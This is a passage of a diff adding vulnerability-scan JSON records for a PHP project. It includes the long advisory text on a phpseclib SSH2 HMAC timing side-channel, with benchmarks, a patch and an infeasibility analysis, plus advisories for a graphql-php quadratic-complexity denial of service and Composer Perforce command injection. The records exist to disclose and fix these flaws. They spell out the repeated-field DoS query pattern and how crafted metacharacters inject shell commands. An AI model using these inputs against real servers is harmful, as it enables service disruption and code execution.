SSH2.php:3410:\n\n```\nUsing != (SSH2.php:3405,3410 pattern):\n  first-byte mismatch: 44.33 ns\n  last-byte mismatch:  58.19 ns\n  Δ (last - first):    13.86 ns  <-- timing leak signal\n\nUsing hash_equals() (the fix):\n  first-byte mismatch: 113.67 ns\n  last-byte mismatch:  112.93 ns\n  Δ (last - first):    -0.74 ns  <-- should be flat (noise)\n```\n\nThe 13.86 ns vs 2.86 ns variation between runs is within measurement variance \u2014 the signal is real and the sign matches every run (last > first for `!=`, flat for `hash_equals`).\n\n## Impact\n\n**Severity: Low (defense-in-depth).** This is a real CWE-208 instance, but it is not a practical remote vulnerability.\n\n### Why exploitation over the network is infeasible\n\n1. **Signal is tiny.** ~3-14 ns per HMAC compare. Network RTT jitter on a reasonable LAN is 100 µs (100,000 ns). On the internet it is 1-10 ms. The signal-to-noise ratio for a remote observer is ~1e-5 to 1e-7.\n\n2. **One measurement per connection.** On every MAC failure, `SSH2.php:3406/3411` calls `disconnect_helper(MAC_ERROR)` and throws. The connection is torn down. A reconnect goes through a fresh key exchange, producing a new HMAC key. The HMAC over a fresh key is uncorrelated with the prior HMAC. An attacker cannot accumulate prefix-matching information across connections because there is no fixed target.\n\n3. **MAC is over sequence-numbered data.** Each packet's MAC input includes `$this->get_seq_no` (line 3410) or a nonce (line 3404). Even within a single connection, replays are impossible \u2014 every MAC is bound to a distinct seq number. There is no stable oracle to probe.\n\n4. **No adaptive probe.** A Bleichenbacher/Lucky13-style attack needs tens of thousands of adaptive queries against a single secret. SSH's hard disconnect eliminates this primitive entirely.\n\n5. **Rough sample-count requirement.** To distinguish a 3 ns signal from 1 ms jitter with high confidence you need roughly `(noise / signal)^2 ≈ (1e6 / 3)^2 ≈ 1e11` independent samples. With one sample per connection (and each connection being against a fresh secret), this is unreachable on any practical scale.\n\n### What remains real\n\n1. **Cryptographic hygiene.** A security library should not use non-constant-time comparison on MACs, period. That is standard practice (RFC 4634, NIST SP 800-131A guidance on cryptographic implementations).\n2. **Code correctness / API consistency.** The library already uses `hash_equals()` in 9 other comparable places. The SSH2 MAC path is inconsistent with the rest of the codebase.\n3. **Future-proofing.** If PHP or the underlying `memcmp()` implementation changes, or if a future MAC algorithm uses longer digests, the signal grows linearly. A constant-time comparison eliminates the concern permanently.\n4. **Static analysis / audit hygiene.** Cryptographic linters (e.g., GitHub CodeQL's `js/timing-attack`, phpcs-security-audit) flag non-constant-time comparisons on secret values. A clean codebase passes those checks.\n\n### CVSS breakdown\n\n`CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N` = **3.7 (Low)**\n\n- **AV:N** \u2014 network path, attacker on the SSH transport.\n- **AC:H** \u2014 extremely high complexity; remote exploitation is not demonstrated and is believed infeasible.\n- **PR:N/UI:N** \u2014 no prior auth or interaction needed to observe the timing (if there were any signal).\n- **S:U** \u2014 no scope change.\n- **C:L / I:N / A:N** \u2014 theoretical information exposure of MAC prefix bits only, no integrity or availability impact.\n\nThis is the same vector string used for CVE-2026-32935 (the recent AES-CBC padding oracle in the same library), differing only in Confidentiality (L vs H) because padding oracle actually recovers plaintext whereas this MAC timing does not enable any known plaintext recovery.\n\n## Fix\n\nTwo-line patch:\n\n```diff\n--- a/phpseclib/Net/SSH2.php\n+++ b/phpseclib/Net/SSH2.php\n@@ -3402,12 +3402,12 @@ class SSH2\n                 substr($packet->raw, 0, -$this->hmac_size);\n             if (($this->hmac_check->getHash() & \"\\xFF\\xFF\\xFF\\xFF\") == 'umac') {\n                 $this->hmac_check->setNonce(\"\\0\\0\\0\\0\" . pack('N', $this->get_seq_no));\n-                if ($hmac != $this->hmac_check->hash($reconstructed)) {\n+                if (!hash_equals($this->hmac_check->hash($reconstructed), $hmac)) {\n                     $this->disconnect_helper(DisconnectReason::MAC_ERROR);\n                     throw new ConnectionClosedException('Invalid UMAC');\n                 }\n             } else {\n-                if ($hmac != $this->hmac_check->hash(pack('Na*', $this->get_seq_no, $reconstructed))) {\n+                if (!hash_equals($this->hmac_check->hash(pack('Na*', $this->get_seq_no, $reconstructed)), $hmac)) {\n                     $this->disconnect_helper(DisconnectReason::MAC_ERROR);\n                     throw new ConnectionClosedException('Invalid HMAC');\n                 }\n```\n\nThe same one-liner should be applied to `phpseclib/Net/SSH2.php` on `3.0` (lines 3741, 3746), `2.0` (line 3796), and `1.0` (line 3810).\n\n`hash_equals()` is a built-in PHP function available since PHP 5.6. phpseclib's minimum PHP version for all supported branches is well above that, so there is no compatibility concern \u2014 and indeed, as noted, `hash_equals()` is already used throughout the codebase for exactly this purpose.\n\n### PoC 5: prefix-position byte-recovery test (`poc/05_prefix_position_test.php`)\n\nThe critical question: can an attacker recover the MAC byte-by-byte? Tests candidate MACs with 0, 1, 2, ..., 31 correct leading bytes using phpseclib's `Crypt\\Hash` class. 500,000 iterations per position.\n\n```\n 0 correct prefix bytes: tmean= 65.75 ns  sd= 4.89 ns\n 1 correct prefix bytes: tmean= 66.36 ns  sd= 4.77 ns\n 2 correct prefix bytes: tmean= 60.06 ns  sd= 5.29 ns\n 4 correct prefix bytes: tmean= 58.08 ns  sd= 5.24 ns\n 8 correct prefix bytes: tmean= 66.93 ns  sd= 4.60 ns\n12 correct prefix bytes: tmean= 64.01 ns  sd= 4.83 ns\n16 correct prefix bytes: tmean= 61.81 ns  sd= 5.55 ns\n20 correct prefix bytes: tmean= 60.46 ns  sd= 5.40 ns\n24 correct prefix bytes: tmean= 60.53 ns  sd= 4.06 ns\n28 correct prefix bytes: tmean= 60.54 ns  sd= 3.99 ns\n31 correct prefix bytes: tmean= 59.04 ns  sd= 3.96 ns\n\nRange (0 prefix vs 31 prefix): -6.71 ns (NEGATIVE)\n```\n\n**No monotonic signal.** The range is negative (wrong direction for an oracle), and the standard deviations (4-5 ns) are larger than any observed position-dependent delta. Byte-by-byte MAC recovery is not feasible even locally on 32-byte HMACs.\n\nThis conclusively rules out the \"timing oracle for MAC forgery\" escalation path.\n\n## Escalation angles investigated and ruled out\n\n9 rounds of external review suggested various escalation paths. Every one is dead:\n\n| Angle | Result | Evidence |\n|---|---|---|\n| Byte-by-byte MAC recovery | **Dead** | PoC 5: no monotonic signal at 32 bytes (-6.71ns range, wrong sign) |\n| Persistent oracle (connection survives MAC failure) | **Dead** | disconnect_helper() + throw is unconditional (3406-3412); reset_connection() clears all state |\n| Sequence desync (Terrapin-style) | **Dead** | get_seq_no++ at 3469 is AFTER MAC check; failed MAC throws before increment |\n| SSH_MSG_IGNORE MAC bypass | **Dead** | All message types go through get_binary_packet() MAC check before filter() |\n| Memory exhaustion via packet_length | **Dead** | packet_length capped at 0x9000 (36KB) at line 3542 |\n| State machine abuse / fail-open | **Dead** | reset_connection() nulls socket, clears bitmap, all crypto state |\n| Protocol downgrade on MAC failure | **Dead** | Immediate disconnect, no fallback or renegotiation |\n| Padding oracle chain (Lucky13) | **Dead** | MAC check (3405) is BEFORE padding interpretation (3418) |\n| SFTP subsystem bypass | **Dead** | SFTP uses same SSH2 transport, same MAC verification |\n| BigInteger type confusion | **Dead** | Engine selected at construction, not per-packet |\n| Pre-auth reachability | Yes, but irrelevant | One guess per connection with fresh keys = no oracle |\n\n## Devil's advocate review\n\nEvery objection I could think of, addressed:\n\n**\"This is just a code smell. Show me a real exploit.\"**\nAcknowledged. The report does not claim remote exploitability. It is submitted as Low / defense-in-depth, consistent with how similar findings are treated in other cryptographic libraries (see e.g. OpenSSH commits replacing `memcmp()` with `timingsafe_bcmp` for similar reasons).\n\n**\"PHP's `!=` might not even short-circuit \u2014 you're just seeing noise.\"**\nPoC 2 rules this out. Timing scales monotonically and nearly linearly with mismatch position across a 128x range of string lengths (32 bytes → 4096 bytes). That is not noise.\n\n**\"SSH disconnects on MAC failure, so you only get one sample. Case closed.\"**\nCorrect, and the report says so explicitly. This is why the severity is Low rather than High.\n\n**\"There is no adaptive probe because session keys rotate per connection.\"**\nCorrect, and the report says so explicitly. This is the primary reason the network attack is infeasible.\n\n**\"Is this Lucky13-style? Does the MAC check happen after padding?\"**\nNo. MAC verification at `SSH2.php:3399-3414` runs BEFORE any padding interpretation. Padding length is only read at line 3418, strictly after the MAC check. There is no unpadding oracle here. (Lucky13 in phpseclib's AES-CBC decrypt path is a separate, already-fixed issue \u2014 CVE-2026-32935.)\n\n**\"Maybe the `get_seq_no` or nonce path somehow enables forgery.\"**\nNo. The seq number is deterministic (incremented by one per packet) and the nonce (for UMAC) is derived from it. Neither is attacker-controlled in any useful sense. The MAC key is the secret, and it is per-connection.\n\n**\"Is this already reported?\"**\nSearched published advisories (`gh api repos/phpseclib/phpseclib/security-advisories`). Only CVE-2026-32935 is published, for a different code path (AES-CBC padding oracle after MAC verification). The SSH2 MAC comparison issue is not covered by any published advisory. The fix commit for CVE-2026-32935 (`ccc21aef71eb170e9bf819b167e67d1fd9e6e788`) did not touch `SSH2.php:3405` or `:3410`.\n\n**\"Does the project's threat model even consider this in scope?\"**\nSECURITY.md says \"To report a security vulnerability, please use the Tidelift security contact.\" It does not exclude timing side-channels. The maintainer has already fixed constant-time comparison issues in other parts of the library (RSA, OAEP, AES-CBC padding) and uses `hash_equals()` in 9 other places. This issue is consistent with the maintainer's existing security posture, and the fix is trivial.\n\n**\"Is the Low severity appropriate? Could it be informational?\"**\nLow is appropriate. \"Informational\" would be for something that is provably no-impact. This is a demonstrable CWE-208 instance on secret-dependent data. It scores 3.7 under CVSS v3.1 with AC:H and C:L. That is Low, not Informational. The recent CVE-2026-32935 is assigned for a timing-side-channel in the same file category and given CVSS 4.0 = 8.2 (their vector is more severe because padding oracle actually recovers plaintext). This one would score lower than that, which matches the Low designation.\n\n**\"Would a maintainer just close this?\"**\nUnlikely. The fix is a one-liner, there is no behavioral change, it aligns with existing code style in the same codebase, and it silences future audit findings. The maintainer has a track record of accepting similar hardening patches. If they close it, the reason would likely be \"we already know, not worth a CVE\" \u2014 which would still leave the code fixed, which is the goal.\n\n## Suggested reporting path\n\nGitHub PVR is enabled for phpseclib/phpseclib (`{\"enabled\":true}`). SECURITY.md says to use the Tidelift contact, but GitHub PVR is a reasonable alternative and lets the maintainer decide whether to coordinate with Tidelift. Either path is acceptable.\n\nGiven the Low severity, this could also be filed as a public pull request rather than a security advisory. That would be faster for everyone and avoids using the private disclosure channel for a hardening fix.\n\n## Files\n\n- `poc/01_verify_variable_time.php` \u2014 baseline 32-byte timing measurement\n- `poc/02_scaling_test.php` \u2014 decisive scaling test across string lengths\n- `poc/03_hash_equals_scaling.php` \u2014 `!=` vs `hash_equals()` comparison\n- `poc/04_phpseclib_in_context.php` \u2014 end-to-end repro using phpseclib's `Crypt\\Hash`\n- `notes.md` \u2014 research notes, dead ends, escalation angles considered\n- `prior-work.md` \u2014 prior work search results\n- `status.json` \u2014 machine-readable status\n\nKoda Reef",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
+                "source": "GITHUB",
+                "published": "2026-04-10 20:58:10.0",
+                "title": "phpseclib has a variable-time HMAC comparison in SSH2::get_binary_packet() using != instead of hash_equals()",
+                "cwes": [
+                    {
+                        "cweId": 208,
+                        "name": "Observable Timing Discrepancy"
+                    }
+                ],
+                "uuid": "382aa944-61c8-4cc8-90b4-14a7cefaf573",
+                "severityRank": 3,
+                "cweName": "Observable Timing Discrepancy"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:49d15a67-4a45-4986-abb0-57b1e0a36592:382aa944-61c8-4cc8-90b4-14a7cefaf573",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "3.0.51",
+                "name": "phpseclib",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpseclib/phpseclib@3.0.49",
+                "uuid": "49d15a67-4a45-4986-abb0-57b1e0a36592",
+                "version": "3.0.49",
+                "group": "phpseclib"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-14 12:24:34.95"
+            },
+            "vulnerability": {
+                "severity": "LOW",
+                "cvssV3BaseScore": 3.7,
+                "vulnId": "CVE-2026-40194",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-r854-jrxh-36qx",
+                        "cveId": "CVE-2026-40194"
+                    }
+                ],
+                "references": "* [https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac](https://github.com/phpseclib/phpseclib/commit/ffe48b6b1b1af6963327f0a5330e3aa004a194ac)\n* [https://github.com/phpseclib/phpseclib/releases/tag/1.0.28](https://github.com/phpseclib/phpseclib/releases/tag/1.0.28)\n* [https://github.com/phpseclib/phpseclib/releases/tag/2.0.53](https://github.com/phpseclib/phpseclib/releases/tag/2.0.53)\n* [https://github.com/phpseclib/phpseclib/releases/tag/3.0.51](https://github.com/phpseclib/phpseclib/releases/tag/3.0.51)\n* [https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx](https://github.com/phpseclib/phpseclib/security/advisories/GHSA-r854-jrxh-36qx)",
+                "cweId": 208,
+                "description": "phpseclib is a PHP secure communications library. Prior to 3.0.51, 2.0.53, and 1.0.28, phpseclib\\Net\\SSH2::get_binary_packet() uses PHP's != operator to compare a received SSH packet HMAC against the locally computed HMAC. != on equal-length binary strings in PHP uses memcmp(), which short-circuits on the first differing byte. This is a real variable-time comparison (CWE-208), proven by scaling benchmarks. This vulnerability is fixed in 3.0.51, 2.0.53, and 1.0.28.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
+                "epssScore": 0.00013,
+                "source": "NVD",
+                "published": "2026-04-10 21:16:27.583",
+                "cwes": [
+                    {
+                        "cweId": 208,
+                        "name": "Observable Timing Discrepancy"
+                    }
+                ],
+                "uuid": "9d1ff5a2-1ccf-4e19-99fd-5fa221779a61",
+                "severityRank": 3,
+                "cweName": "Observable Timing Discrepancy",
+                "epssPercentile": 0.02284
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:49d15a67-4a45-4986-abb0-57b1e0a36592:9d1ff5a2-1ccf-4e19-99fd-5fa221779a61",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "v15.32.1",
+                "name": "graphql-php",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/webonyx/graphql-php@v15.30.2",
+                "uuid": "c09d12ab-1f01-4243-9bfc-8cae6bd747aa",
+                "version": "v15.30.2",
+                "group": "webonyx"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-14 12:24:48.31"
+            },
+            "vulnerability": {
+                "severity": "MEDIUM",
+                "vulnId": "GHSA-68jq-c3rv-pcrr",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-68jq-c3rv-pcrr",
+                        "cveId": "CVE-2026-40476"
+                    }
+                ],
+                "references": "* [https://github.com/webonyx/graphql-php/security/advisories/GHSA-68jq-c3rv-pcrr](https://github.com/webonyx/graphql-php/security/advisories/GHSA-68jq-c3rv-pcrr)\n* [https://github.com/webonyx/graphql-php/releases/tag/v15.31.5](https://github.com/webonyx/graphql-php/releases/tag/v15.31.5)\n* [https://github.com/advisories/GHSA-68jq-c3rv-pcrr](https://github.com/advisories/GHSA-68jq-c3rv-pcrr)",
+                "cvssV4Score": 6.9,
+                "cweId": 407,
+                "description": "The `OverlappingFieldsCanBeMerged` validation rule exhibits quadratic time complexity when processing queries with many repeated fields sharing the same response name. An attacker can send a crafted query like `{ hello hello hello ... }` with thousands of repeated fields, causing excessive CPU usage during validation before execution begins.\n\nThis is not mitigated by existing QueryDepth or QueryComplexity rules.\n\n**Observed impact (tested on v15.31.4):**\n- 1000 fields: ~0.6s\n- 2000 fields: ~2.4s\n- 3000 fields: ~5.3s\n- 5000 fields: request timeout (>20s)\n\n**Root cause:** `collectConflictsWithin()` performs O(n²) pairwise comparisons of all fields with the same response name. For identical repeated fields, every comparison returns \"no conflict\" but the quadratic iteration count causes resource exhaustion.\n\n**Fix:** Deduplicate structurally identical fields before pairwise comparison, reducing the complexity from O(n²) to O(u²) where u is the number of unique field signatures (typically 1 for this attack pattern).\n\n**Credit:** Ashwak N (ashwakn04@gmail.com)",
+                "source": "GITHUB",
+                "published": "2026-04-14 01:05:05.0",
+                "title": "graphql-php is affected by a Denial of Service via quadratic complexity in OverlappingFieldsCanBeMerged validation",
+                "cwes": [
+                    {
+                        "cweId": 407,
+                        "name": "Inefficient Algorithmic Complexity"
+                    }
+                ],
+                "uuid": "024053c6-0dab-485a-bb98-a500b395c160",
+                "severityRank": 2,
+                "cweName": "Inefficient Algorithmic Complexity",
+                "cvssV4Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:c09d12ab-1f01-4243-9bfc-8cae6bd747aa:024053c6-0dab-485a-bb98-a500b395c160",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "2.9.7",
+                "name": "composer",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/composer/composer@2.9.5",
+                "uuid": "cb3ccd6a-dec4-4840-964a-093be384836f",
+                "version": "2.9.5",
+                "group": "composer"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-15 00:00:46.094"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 8.8,
+                "vulnId": "GHSA-gqw4-4w2p-838q",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-gqw4-4w2p-838q",
+                        "cveId": "CVE-2026-40261"
+                    }
+                ],
+                "references": "* [https://github.com/composer/composer/security/advisories/GHSA-gqw4-4w2p-838q](https://github.com/composer/composer/security/advisories/GHSA-gqw4-4w2p-838q)\n* [https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2026-40261.yaml](https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2026-40261.yaml)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-40261](https://nvd.nist.gov/vuln/detail/CVE-2026-40261)\n* [https://github.com/composer/composer/releases/tag/2.9.6](https://github.com/composer/composer/releases/tag/2.9.6)\n* [https://github.com/advisories/GHSA-gqw4-4w2p-838q](https://github.com/advisories/GHSA-gqw4-4w2p-838q)",
+                "cweId": 20,
+                "description": "### Impact\nThe `Perforce::syncCodeBase()` method appended the `$sourceReference` parameter to a shell command without proper escaping, allowing an attacker to inject arbitrary commands through a crafted source reference containing shell metacharacters. Further as in GHSA-wg36-wvj6-r67p / CVE-2026-40176 the `Perforce::generateP4Command()` method constructed shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping from the source url field. Composer would execute these injected commands even if Perforce is not installed.\n\nThe source reference and url are provided as part of package metadata. Any Composer package repository can serve package metadata declaring perforce as a source type with a malicious source reference or source url. This means the vulnerability can be exploited through any package served by a compromised or malicious Composer repository. An attack does not require Perforce to be installed on the client, as Composer will attempt to execute the constructed command regardless.\n\nThis vulnerability is exploitable when installing or updating dependencies from source (`--prefer-source`, default when installing dev prefixed versions), even if you do not use Perforce.\n\n### Patches\nFixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline)\n\nNote, the fix for the source url in the `Perforce::generateP4Command()` was addressed as part of the patches for GHSA-wg36-wvj6-r67p / CVE-2026-40176 in the same versions.\n\n### Workarounds\n\n- Avoid installing dependencies from source by using `--prefer-dist` or the `preferred-install: dist` config setting.\n- Only use trusted Composer repositories.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
+                "source": "GITHUB",
+                "published": "2026-04-14 20:01:42.0",
+                "title": "Composer has a command injection via malicious perforce reference",
+                "cwes": [
+                    {
+                        "cweId": 20,
+                        "name": "Improper Input Validation"
+                    },
+                    {
+                        "cweId": 78,
+                        "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+                    }
+                ],
+                "uuid": "05da2e28-bdd8-4d25-9cbe-1cc4b32cb0de",
+                "severityRank": 1,
+                "cweName": "Improper Input Validation"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:cb3ccd6a-dec4-4840-964a-093be384836f:05da2e28-bdd8-4d25-9cbe-1cc4b32cb0de",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "2.9.7",
+                "name": "composer",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/composer/composer@2.9.5",
+                "uuid": "cb3ccd6a-dec4-4840-964a-093be384836f",
+                "version": "2.9.5",
+                "group": "composer"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-15 00:00:46.263"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.8,
+                "vulnId": "GHSA-wg36-wvj6-r67p",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-wg36-wvj6-r67p",
+                        "cveId": "CVE-2026-40176"
+                    }
+                ],
+                "references": "* [https://github.com/composer/composer/security/advisories/GHSA-wg36-wvj6-r67p](https://github.com/composer/composer/security/advisories/GHSA-wg36-wvj6-r67p)\n* [https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2026-40176.yaml](https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2026-40176.yaml)\n* [https://nvd.nist.gov/vuln/detail/CVE-2026-40176](https://nvd.nist.gov/vuln/detail/CVE-2026-40176)\n* [https://github.com/composer/composer/releases/tag/2.9.6](https://github.com/composer/composer/releases/tag/2.9.6)\n* [https://github.com/advisories/GHSA-wg36-wvj6-r67p](https://github.com/advisories/GHSA-wg36-wvj6-r67p)",
+                "cweId": 20,
+                "description": "### Impact\nThe `Perforce::generateP4Command()` method constructed shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository could inject arbitrary commands through these values, leading to command execution in the context of the user running Composer. Composer would execute these injected commands even if Perforce is not installed.\n\nVCS repositories are only loaded from the root composer.json file located in the directory you execute Composer commands in and from the composer config directory (e.g. `~/.config/composer/composer.json`). So this vulnerability cannot be exploited through composer.json files of packages installed as dependencies.\n\nYou are at risk of command execution if you run Composer commands on untrusted projects with attacker supplied composer.json files, regardless of whether you or any of your dependencies use Perforce.\n\n### Patches\nFixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline)\n\n### Workarounds\n- Carefully inspect composer.json files before running Composer on them. Verify that Perforce-related fields contain valid values.\n- Only run Composer commands on projects from trusted sources.",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
+                "source": "GITHUB",
+                "published": "2026-04-14 20:03:08.0",
+                "title": "Composer has a command injection via malicious perforce repository",
+                "cwes": [
+                    {
+                        "cweId": 20,
+                        "name": "Improper Input Validation"
+                    },
+                    {
+                        "cweId": 78,
+                        "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+                    }
+                ],
+                "uuid": "18642485-f8a5-4de7-b39a-2f18b691ea83",
+                "severityRank": 1,
+                "cweName": "Improper Input Validation"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:cb3ccd6a-dec4-4840-964a-093be384836f:18642485-f8a5-4de7-b39a-2f18b691ea83",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "2.9.7",
+                "name": "composer",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/composer/composer@2.9.5",
+                "uuid": "cb3ccd6a-dec4-4840-964a-093be384836f",
+                "version": "2.9.5",
+                "group": "composer"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-15 11:20:24.398"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 8.8,
+                "vulnId": "CVE-2026-40261",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-gqw4-4w2p-838q",
+                        "cveId": "CVE-2026-40261"
+                    }
+                ],
+                "references": "* [https://github.com/composer/composer/releases/tag/2.9.6](https://github.com/composer/composer/releases/tag/2.9.6)\n* [https://github.com/composer/composer/security/advisories/GHSA-gqw4-4w2p-838q](https://github.com/composer/composer/security/advisories/GHSA-gqw4-4w2p-838q)",
+                "cweId": 20,
+                "description": "Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping, and additionally in the Perforce::generateP4Command() method as in GHSA-wg36-wvj6-r67p / CVE-2026-40176, which interpolates user-supplied Perforce connection parameters (port, user, client) from the source url field without proper escaping. An attacker can inject arbitrary commands through crafted source reference or source url values containing shell metacharacters, even if Perforce is not installed. Unlike CVE-2026-40176, the source reference and url are provided as part of package metadata, meaning any compromised or malicious Composer repository can serve package metadata declaring perforce as a source type with malicious values. This vulnerability is exploitable when installing or updating dependencies from source, including the default behavior when installing dev-prefixed versions. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline). If developers are unable to immediately update, they can avoid installing dependencies from source by using --prefer-dist or the preferred-install: dist config setting, and only use trusted Composer repositories as a workaround.",
+                "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
+                "epssScore": 0.00039,
+                "source": "NVD",
+                "published": "2026-04-15 21:17:27.693",
+                "cwes": [
+                    {
+                        "cweId": 20,
+                        "name": "Improper Input Validation"
+                    },
+                    {
+                        "cweId": 78,
+                        "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+                    }
+                ],
+                "uuid": "8dafdf28-dfe8-486a-9bac-34d73f6eed17",
+                "severityRank": 1,
+                "cweName": "Improper Input Validation",
+                "epssPercentile": 0.1179
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:cb3ccd6a-dec4-4840-964a-093be384836f:8dafdf28-dfe8-486a-9bac-34d73f6eed17",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "2.9.7",
+                "name": "composer",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/composer/composer@2.9.5",
+                "uuid": "cb3ccd6a-dec4-4840-964a-093be384836f",
+                "version": "2.9.5",
+                "group": "composer"
+            },
+            "attribution": {
+                "analyzerIdentity": "OSSINDEX_ANALYZER",
+                "attributedOn": "2026-04-15 11:20:24.531"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.8,
+                "vulnId": "CVE-2026-40176",
+                "aliases": [
+                    {
+                        "ghsaId": "GHSA-wg36-wvj6-r67p",
+                        "cveId": "CVE-2026-40176"
+                    }
+                ],
+                "references": "* [https://github.com/composer/composer/releases/tag/2.9.6](https://github.com/composer/composer/releases/tag/2.9.6)\n* [https://github.com/composer/composer/security/advisories/GHSA-wg36-wvj6-r67p](https://github.com/composer/composer/security/advisories/GHSA-wg36-wvj6-r67p)",
+                "cweId": 20,
+                "description": "Composer is a dependency manager for PHP. Versions 1.0 through 2.2.26 and 2.3 through 2.9.5 contain a command injection vulnerability in the Perforce::generateP4Command() method, which constructs shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker can inject arbitrary commands through these values in a malicious composer.json declaring a Perforce VCS repository, leading to command execution in the context of the user running Composer, even if Perforce is not installed. VCS repositories are only loaded from the root composer.json or the composer config directory, so this cannot be exploited through composer.json files of packages installed as dependencies. Users are at risk if they run Composer commands on untrusted projects with attacker-supplied composer.json files. This issue has been fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline).",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
+                "epssScore": 0.00011,
+                "source": "NVD",
+                "published": "2026-04-15 21:17:27.357",
+                "cwes": [
+                    {
+                        "cweId": 20,
+                        "name": "Improper Input Validation"
+                    },
+                    {
+                        "cweId": 78,
+                        "name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+                    }
+                ],
+                "uuid": "bf0b594b-921e-4177-a27f-720e6a4f2515",
+                "severityRank": 1,
+                "cweName": "Improper Input Validation",
+                "epssPercentile": 0.01509
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:cb3ccd6a-dec4-4840-964a-093be384836f:bf0b594b-921e-4177-a27f-720e6a4f2515",
+            "analysis": {
+                "isSuppressed": false
+            }
+        },
+        {
+            "component": {
+                "latestVersion": "13.1.7",
+                "name": "phpunit",
+                "project": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+                "purl": "pkg:composer/phpunit/phpunit@10.5.48",
+                "uuid": "ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac",
+                "version": "10.5.48",
+                "group": "phpunit"
+            },
+            "attribution": {
+                "analyzerIdentity": "INTERNAL_ANALYZER",
+                "attributedOn": "2026-04-18 23:06:27.224"
+            },
+            "vulnerability": {
+                "severity": "HIGH",
+                "cvssV3BaseScore": 7.8,
